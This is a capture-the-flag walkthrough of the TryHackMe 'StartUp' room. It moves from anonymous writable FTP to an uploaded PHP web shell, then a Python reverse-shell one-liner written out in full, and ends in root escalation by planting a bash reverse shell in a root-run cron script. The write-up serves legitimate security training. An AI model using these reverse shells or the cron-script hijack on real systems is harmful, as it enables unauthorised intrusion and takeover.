— Tryhackme — 3 min read
StartUp is an easy category room developed by r1gormort1s . You can check out the room here.
As always , let's start with nmap.
nmap -sC -sV -v -oA nmap/initial IP
1PORT STATE SERVICE VERSION221/tcp open ftp vsftpd 3.0.33| ftp-anon: Anonymous FTP login allowed (FTP code 230)4| drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable]5| -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg6|_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt7| ftp-syst:8| STAT:9| FTP server status:10| Connected to 10.9.51.11811| Logged in as ftp12| TYPE: ASCII13| No session bandwidth limit14| Session timeout in seconds is 30015| Control connection is plain text16| Data connections will be plain text17| At session startup, client count was 318| vsFTPd 3.0.3 - secure, fast, stable19|_End of status2022/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)21| ssh-hostkey:22| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)23| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)24|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)2580/tcp open http Apache httpd 2.4.18 ((Ubuntu))26| http-methods:27|_ Supported Methods: GET HEAD POST OPTIONS28|_http-server-header: Apache/2.4.18 (Ubuntu)29|_http-title: Maintenance30Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We have anonymous FTP login . So lets jump in and see what's there in the ftp dir.
The notice.txt file said
1Whoever is leaving these damn Among Us memes in this share, it IS NOT FUNNY. People downloading documents from our website will think we are a joke! Now I dont know who it is, but Maya is looking pretty sus.
Nothing interesting , we just have a name Maya for now. We also have a image , important.jpg . I ran strings , exiftool , did some stego on it , but in the end it's just a rabbithole . What I forgot is that the as nmap scan showed , we have write permissions in ftp . And if you have that , you shouldn't even bother trying lame stego stuff !
I got a simple php web shell from here and uploaded it to ftp dir. But we don't know yet , where on the server it got uploaded. So , I ran gobuster for some recon and we have a /files directory . So the ftp stuff is present on the server in /files/ftp dir. Accessing our webshell in browser , we have code execution.
Now, the first thing you do when you get code execution , Yup, get a reverse shell ! So , I ran a simple python one liner reverse shell and we have a SHELL !
1python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((<IP>,<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
To make it stable and full TTY , the usual stuff
1python -c 'import pty;pty.spawn("/bin/bash")'2export TERM=xterm3CTRL-Z to background it.4stty raw -echo5fg6reset
And now we have a PROPER SHELL ! To confirm that , we run id and indeed , we are inside as www-data.
Time for some recon. I manually looked for some interesting stuff in the system and in the root directory I got something interesting.
We now have the secret recipe. If we look closely , there is one more directory that is not usual , incidents . This contained a file which is outright suspicious as it is named suspicious.pcapng. So , this is a network capture file and as the directory name suggests , may be it is an incident log file . Opening it up with wireshark , we see a lot of HTTP and TCP traffic. Initially , I looked at exported HTTP objects but there was nothing interesting there . On following a TCP stream , I saw an interesting conversation.
We have a password being used by some attacker in his attack . There is just one user in the system lennie , trying this password with lennie , we get a match . Now we are lennie . Looking in lennie's home directory , we have our user flag .
Okay , so if we see the contents of lennie's home directory we see a scripts directory owned by root which is interesting.
But weirdly , there is no SUID bit set , we don't have also write permissions for planner.sh , so let's leave it for now . Now , I used linpeas for enumeration , but it didn't find anything juicy . I was stuck at this point . The only thing we have is a root owned script . Let's focus on that . planner.sh is root owned , and it simply does two things.
- Puts the content of env variable LIST in startup_list.txt file . We can't do anything bad to it.
- Runs /etc/print.sh .
Let's look at the permissions of print.sh . Dude , we have write permissions. But even if we do some stuff with this , we dont have SUID , so we can't be root . OR CAN WE ? I decided to use pspy64 which is basically a process snooper that tells the processes running in the system
NO , its not same as running ps aux man , it even shows you privileged processes , try it , its COOL!)
And as I suspected , root is running this script .So , the classic bad stuff , we have write permissions for print.sh , put a dumb bash one liner reverse shell , andddd listen on your dumb netcat . After a minute , we have our root shell and our ROOT flag.
So this was overall a relatively easy tryhackme room with
misconfigured FTP , Insecurely placed incident logs and bad file permissions .
Hope you learned something new . Thanks for reading and as always
See ya later!